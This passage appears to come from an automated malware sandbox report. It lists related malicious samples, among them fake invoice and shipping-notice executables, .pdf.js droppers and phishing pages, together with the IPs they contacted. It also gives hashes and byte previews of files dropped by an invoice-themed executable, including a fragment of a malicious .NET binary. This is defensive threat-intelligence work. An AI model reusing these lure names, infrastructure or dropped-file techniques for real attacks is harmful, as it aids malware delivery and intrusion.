                                                                                                                                                                                                                                                                transmountain cyril_jenkins alex.correa.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.237.60
                                                                                                                                                                                                                                                                Scanned3345609.hTmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.237.60
                                                                                                                                                                                                                                                                Call from 858..9381.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 40.99.150.82
                                                                                                                                                                                                                                                                volvo linda.hoff alex.correa.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.237.60
                                                                                                                                                                                                                                                                INV20230104-BR.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.13
                                                                                                                                                                                                                                                                http://www.atlantaforklift.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 157.55.162.106
                                                                                                                                                                                                                                                                Fax_681111.shtmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.238.45
                                                                                                                                                                                                                                                                REGISTER CAT 25 DEC SME.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.136.8
                                                                                                                                                                                                                                                                REGISTER CAT 25 DEC SME.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.137.10
                                                                                                                                                                                                                                                                message (1).htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 52.98.175.2
                                                                                                                                                                                                                                                                CrucialUKScan.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.237.60
                                                                                                                                                                                                                                                                INVOICE-426391.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.238.45
                                                                                                                                                                                                                                                                DANILENKODEINV20230104-BR.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.244
                                                                                                                                                                                                                                                                obsERXPYBe.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.176
                                                                                                                                                                                                                                                                pu8PvGDGha.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.176
                                                                                                                                                                                                                                                                TNT AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.226
                                                                                                                                                                                                                                                                c6U3ESasLi.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.176
                                                                                                                                                                                                                                                                image-002.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.8
                                                                                                                                                                                                                                                                DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.226
                                                                                                                                                                                                                                                                COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.226
                                                                                                                                                                                                                                                                COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.226
                                                                                                                                                                                                                                                                AWB#6375872554.pdf.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.16
                                                                                                                                                                                                                                                                DHL SHIPMENT INVOICE.pdf.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.16
                                                                                                                                                                                                                                                                scan_docs.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.77
                                                                                                                                                                                                                                                                AWB#75698789.pdf.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.77
                                                                                                                                                                                                                                                                Non HAZ DECLERATION.pdf.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.77
                                                                                                                                                                                                                                                                DHL_INVOICE DOCUMENTS.pdf.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.77
                                                                                                                                                                                                                                                                DOCS - 939.pdf.scr.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.28
                                                                                                                                                                                                                                                                MV. KHARIS PEAGSUS V.SN2216.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.194
                                                                                                                                                                                                                                                                Payment Proof.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.194
                                                                                                                                                                                                                                                                PAYMENT FOR INV.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.194
                                                                                                                                                                                                                                                                ( Purchase Order No. 20P3200023 ).exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 194.5.98.212
                                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eDhl.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                Contracts0001.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                Copy_Company-profile.vbeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                3228QkgALx.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                wNe6jmIL7c.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                Dhl.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                4DDFE866BEAB3C6023F5A5C7E01D061016BC940DE5137.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                university of kentucky indirect cost rate agreement 5564.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                INV20230104-BR.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                https://project3-3b599.web.app/Get hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                Ys6s3AZ2qW.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                7X5WCb8HDW.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                eclattttt.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                eclattttt.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                SecuriteInfo.com.Win32.RansomX-gen.1482.3911.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                SecuriteInfo.com.Win32.Trojan-gen.5667.19000.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                ltroubvle_sib.msiGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                RZxpPKvkpjbNPWT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 13.107.43.12
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19Copy_Company-profile.vbeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                https://taxes.rpacx.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                http://www.farmandcity.co.zwGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                wescom Sharedscanned documents .HTMl.HTmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                http://object.fmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                malicious-attachement.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                transmountain cyril_jenkins alex.correa.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                transmountain cyril_jenkins alex.correa.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                https://www.ordway-stevenot.net/showmedia.php?mediaID=15385&tngpage=5639&sitever=standardGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                https://linkprotect.cudasvc.com/url?a=https%3a%2f%2ffiledn.com%2flmtf06DxeexRuabg6razTLL%2ftestoff%2520%281%29.html&c=E,1,AUxv9bLRdb6z4Onh2l2O8FmlxAdL6LQVGldhTgR8KFlv8YvGIKyFlv1-hY-UfXjR3xzRRYwwojP0y6u691T3MUwR5XBYXeYy3z6tGYugygxG5A,,&typo=1Get hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=VgD8waolO0-tFADFyc857993i8I7jcFJqPuozdaK5BZURVNBUDdPVlBGQlBEN0MyVFBTMkVRMVVNVS4uGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                volvo linda.hoff alex.correa.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                New Voicemail_devry_132023 50052 p.m..htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                http://www.atlantaforklift.comGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                https://sites.google.com/view/435y88y5fdgf/homeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                REGISTER CAT 25 DEC SME.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                setup.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                account statement.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                https://indd.adobe.com/view/3b66a14d-d2ad-4b6a-bd77-de63a85edbd5Get hashmaliciousBrowse
                                                                                                                                                                                                                                                                • 144.76.136.153
                                                                                                                                                                                                                                                                No context
                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                Size (bytes):1537
                                                                                                                                                                                                                                                                Entropy (8bit):5.3478589519339295
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzvFHLHKdHKBqHKs:Pq5qXEwCYqhQnoPtIxHeqzNrqdq4qs
                                                                                                                                                                                                                                                                MD5:F6D3657BD1FBEF54E7F7BACB2497E327
                                                                                                                                                                                                                                                                SHA1:A0A712015C242DCC28B69CDF567F594627C9CFA0
                                                                                                                                                                                                                                                                SHA-256:5B16B4A3E65F04484B12171163A2A739409FA7F8C3D69BF9BAD961618D973301
                                                                                                                                                                                                                                                                SHA-512:0231195A111259A3AA48526DCBEA98394099794C710C3FB8E0E12E2B4D30C60FB4064F7F4F671866FB0D94585E23B73C1270440242B25DA60CCFFA82B0B74306
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8704
                                                                                                                                                                                                                                                                Entropy (8bit):4.76941550076102
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:JaqDtNDC8SkkDnmWErVC7jQ9kL4VFRdz95LmGLlQiAY6RtQWRkZ4HhngzNt:JLj1DKiog9kL4VFf95lLDAY6HYiHRi
                                                                                                                                                                                                                                                                MD5:0E4816AC89A716B262402CD1791400DF
                                                                                                                                                                                                                                                                SHA1:A9F39BD3330B1F70535C716B51E55442E930B164
                                                                                                                                                                                                                                                                SHA-256:BEA1C74AD8FCB8C06967F98F93275784F5DF8266FF9E6AB06273AE48AFED0F8A
                                                                                                                                                                                                                                                                SHA-512:00080A26CD21CD690DCCA18461E7AE2FA10DA6231EE05CFDFF59F580F0B8AA056AD3A502D98364272B2B7AFB0365A04F188569823772719D0366605EAA125767
                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .................0.............Z6... ...@....@.. ....................................`..................................6..O....@..l....................`.......5............................................... ............... ..H............text...`.... ...................... ..`.rsrc...l....@......................@..@.reloc.......`....... ..............@..B................<6......H.......l%..............45..............................................N.(.....(.....(....*..{....r...po.....{....(....o....*..{....(.....{....o....t....o....o....*....0..>........{....o....t....o......o.....{....o......"...%.. .o......(....,*.{.....{....o....t....o........o....o....*.{....o....t....o......o.....{....o......"...%.. .o......(....,*.{.....{....o....t....o........o....o....*.{....o....t....o......o.....{....o......"...%.. .o......(....,).{.....{....o....t....o.
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):944
                                                                                                                                                                                                                                                                Entropy (8bit):4.989952581991176
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:tklAGnd6CsGkMyGWKyMPVGADxapaiH8GdAPORkoao9W7im51w7j9eF6xIjSat5R9:qlPdRNuKyM85266m7p9xZ2
                                                                                                                                                                                                                                                                MD5:BA32BC32E2332E7BCB3DFD042796DE94
                                                                                                                                                                                                                                                                SHA1:997D44FBAA2577575546C0BC4902F06A56335845
                                                                                                                                                                                                                                                                SHA-256:D6FB58DF012C120449C1D849E057C5862992784185D3329B84E27EBBADCDAB77
                                                                                                                                                                                                                                                                SHA-512:A0C8239F0ECF95E76EECDD7073E5B1D86FB264F265722A28EFE61917E346A0D88A0B2C335651B589A9715DF3DFE20038F0F9FF11FCE02588228950B0BCCA01CA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{. "geoplugin_request":"84.17.52.8",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Zurich",. "geoplugin_region":"Zurich",. "geoplugin_regionCode":"ZH",. "geoplugin_regionName":"Zurich",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"",. "geoplugin_countryCode":"CH",. "geoplugin_countryName":"Switzerland",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"EU",. "geoplugin_continentName":"Europe",. "geoplugin_latitude":"47.43",. "geoplugin_longitude":"8.5718",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"Europe\/Zurich",. "geoplugin_currencyCode":"CHF",. "geoplugin_currencySymbol":"CHF",. "geoplugin_currencySymbol_UTF8":"CHF",. "geoplugin_currencyConverter":0.9304.}
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5829
                                                                                                                                                                                                                                                                Entropy (8bit):4.8968676994158
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                                                                                                                                                                                                                                                MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                                                                                                                                                                                                                                                SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                                                                                                                                                                                                                                                SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                                                                                                                                                                                                                                                SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):16496
                                                                                                                                                                                                                                                                Entropy (8bit):5.549691958573251
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Kte/V023nVVUzJEbZCwSBxn2iliJ9giSJ3uzp1UYv:IJEb4w4xjJicudv
                                                                                                                                                                                                                                                                MD5:7388D2AA1EE8C223A479A5CF15F7F24C
                                                                                                                                                                                                                                                                SHA1:01B9F9BD7E7A36F322B05EB3B2BC534AAB78CF58
                                                                                                                                                                                                                                                                SHA-256:40927EE2BB65CDF955322719659E777215C1ADCD5C09E2C8F4C225F29F922EBF
                                                                                                                                                                                                                                                                SHA-512:C5119947193108F510C16492D7B3947A88C27AC75070E5A9F094F157D77E59ECFD6C035C9BDF33D0D80528D3593981446C5C1C26E28469C9738F06144B8F10DE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:@...e...........................1...7.,..............@..........H...............<@.^.L."My...:)..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:1
                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:1
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):26738688
                                                                                                                                                                                                                                                                Entropy (8bit):0.9501694666317948
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:ZvlcTaxxujQxeJ2lLadAZf7+yVHgZFDb7uBi:RiQxeJCac1
                                                                                                                                                                                                                                                                MD5:211037333A188A888F259473595602F7
                                                                                                                                                                                                                                                                SHA1:C01516099073F36351F64A61CCD120169F37AA0F
                                                                                                                                                                                                                                                                SHA-256:EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
                                                                                                                                                                                                                                                                SHA-512:388077841AC30BCBBEBAE034C2D2502FBA7C9EEA7E11698DA10916AFF3DB130761A5E0C3E112CAC6FD79E406FB599C6433652D5819549794AFF4E379159F9E81
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:|..... .......t;.......te3....wg.......................C.....,&...z../&...z{.h.E.........................6..43....wI.............................................................................................\............B.................................................................................................................. .......3....z.........................................................................................................................................................................................................................................<.....{.(...................L.....{O.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):26738688
                                                                                                                                                                                                                                                                Entropy (8bit):0.9501694666317948
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:ZvlcTaxxujQxeJ2lLadAZf7+yVHgZFDb7uBi:RiQxeJCac1
                                                                                                                                                                                                                                                                MD5:211037333A188A888F259473595602F7
                                                                                                                                                                                                                                                                SHA1:C01516099073F36351F64A61CCD120169F37AA0F
                                                                                                                                                                                                                                                                SHA-256:EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
                                                                                                                                                                                                                                                                SHA-512:388077841AC30BCBBEBAE034C2D2502FBA7C9EEA7E11698DA10916AFF3DB130761A5E0C3E112CAC6FD79E406FB599C6433652D5819549794AFF4E379159F9E81
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:|..... .......t;.......te3....wg.......................C.....,&...z../&...z{.h.E.........................6..43....wI.............................................................................................\............B.................................................................................................................. .......3....z.........................................................................................................................................................................................................................................<.....{.(...................L.....{O.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7cd0aa12, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):26738688
                                                                                                                                                                                                                                                                Entropy (8bit):0.9501694666317948
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24576:ZvlcTaxxujQxeJ2lLadAZf7+yVHgZFDb7uBi:RiQxeJCac1
                                                                                                                                                                                                                                                                MD5:211037333A188A888F259473595602F7
                                                                                                                                                                                                                                                                SHA1:C01516099073F36351F64A61CCD120169F37AA0F
                                                                                                                                                                                                                                                                SHA-256:EDCCF5C14BC7577F22DA18972342470F9A6BBE1AA44CE51216B3027F7CFEF65F
